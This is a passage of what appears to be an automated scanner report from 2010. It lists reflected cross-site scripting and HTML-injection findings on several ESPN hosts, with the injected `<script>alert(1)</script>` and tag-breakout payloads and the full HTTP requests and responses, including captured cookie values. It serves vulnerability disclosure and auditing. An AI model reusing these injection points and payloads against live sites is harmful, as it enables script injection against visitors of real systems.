This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/ie8bbdd3<script>alert(1)</script>ee5a32b7b1a/suggestions HTTP/1.1 Host: search.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 139 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/s/ie8bbdd3<script>alert(1)</script>ee5a32b7b1a/suggestions</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 53445<script>alert(1)</script>6448148b6cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/ie8/suggestions53445<script>alert(1)</script>6448148b6cf HTTP/1.1 Host: search.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 139 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/s/ie8/suggestions53445<script>alert(1)</script>6448148b6cf</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e04cf<script>alert(1)</script>68bc7ba9f82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sendtofriende04cf<script>alert(1)</script>68bc7ba9f82/SendToFriend HTTP/1.1 Host: sendtofriend.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 147 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-03/04
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/sendtofriende04cf<script>alert(1)</script>68bc7ba9f82/SendToFriend</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7bae5<script>alert(1)</script>2f2d8562032 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sendtofriend7bae5<script>alert(1)</script>2f2d8562032/espn HTTP/1.1 Host: sendtofriend.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 139 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-03/04
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/sendtofriend7bae5<script>alert(1)</script>2f2d8562032/espn</BODY></HTML>
2.49. http://soccernet.espn.go.com/world-cup/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://soccernet.espn.go.com
Path:
/world-cup/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2757a"><script>alert(1)</script>d8f9d1d4373 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /world-cup/?2757a"><script>alert(1)</script>d8f9d1d4373=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 12:56:45 GMT Content-Type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN15 Set-Cookie: SWID=3049331C-CFBF-4614-8EC0-FF585AF6D5A9; path=/; expires=Sat, 06-Nov-2030 12:56:42 GMT; domain=.go.com; Cache-Expires: Sat, 06 Nov 2010 12:58:42 GMT Content-Length: 71086 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 16 Nov 2010 12:56:45 GMT; Path=/; Domain=.go.com Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FIFA World Cup 2010 ...[SNIP]... <a href="/worldcup/?2757a"><script>alert(1)</script>d8f9d1d4373=1&topId=800475&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
2.50. http://soccernet.espn.go.com/worldcup/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://soccernet.espn.go.com
Path:
/worldcup/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f969c"><script>alert(1)</script>f855b539bca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /worldcup/?f969c"><script>alert(1)</script>f855b539bca=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=120 Date: Sat, 06 Nov 2010 23:04:42 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:04:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sat, 06 Nov 2010 23:06:42 GMT Content-Length: 71086 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FIFA World Cup 2010 ...[SNIP]... <a href="/worldcup/?f969c"><script>alert(1)</script>f855b539bca=1&topId=800475&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2f74"><a>9d3befebb57 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/162/italyb2f74"><a>9d3befebb57 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:11:07 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:11:07 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Cache-Expires: Sat, 06 Nov 2010 23:16:07 GMT Content-Length: 81049 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Italy Football / So ...[SNIP]... <a href="/worldcup2010/team?team=162&_slug_=italyb2f74"><a>9d3befebb57&topId=792021&linktext=Lippi+takes+blame+for+Italy%27s+early+exit"> ...[SNIP]...
2.52. http://soccernet.espn.go.com/worldcup2010/team/_/team/162/italy [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/162/italy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efac"><a>1119d197ed9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/162/italy?6efac"><a>1119d197ed9=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:13 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:14:13 GMT Content-Length: 81157 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Italy Football / So ...[SNIP]... <a href="/worldcup2010/team?team=162&6efac"><a>1119d197ed9=1&_slug_=italy&6efac"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53655"><a>809ac03abe5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/164/spain53655"><a>809ac03abe5 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:29:00 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:29:00 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Cache-Expires: Sat, 06 Nov 2010 23:34:00 GMT Content-Length: 80715 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Spain Football / So ...[SNIP]... <a href="/worldcup2010/team?team=164&_slug_=spain53655"><a>809ac03abe5&topId=808124&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
2.54. http://soccernet.espn.go.com/worldcup2010/team/_/team/164/spain [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/164/spain
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99b73"><a>65c93cd4adf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/164/spain?99b73"><a>65c93cd4adf=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:16 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:16 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sat, 06 Nov 2010 23:33:16 GMT Content-Length: 80823 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Spain Football / So ...[SNIP]... <a href="/worldcup2010/team?team=164&99b73"><a>65c93cd4adf=1&_slug_=spain&99b73"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70388"><a>c589cccb3a6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/202/argentina70388"><a>c589cccb3a6 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:50 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:50 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN34 Cache-Expires: Sat, 06 Nov 2010 23:12:50 GMT Content-Length: 81978 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Argentina Football ...[SNIP]... <a href="/worldcup2010/team?team=202&_slug_=argentina70388"><a>c589cccb3a6&topId=805659&linktext=Heinze+wants+Maradona+to+continue"> ...[SNIP]...
2.56. http://soccernet.espn.go.com/worldcup2010/team/_/team/202/argentina [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/202/argentina
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf5da"><a>9b858241cd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/202/argentina?cf5da"><a>9b858241cd5=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; 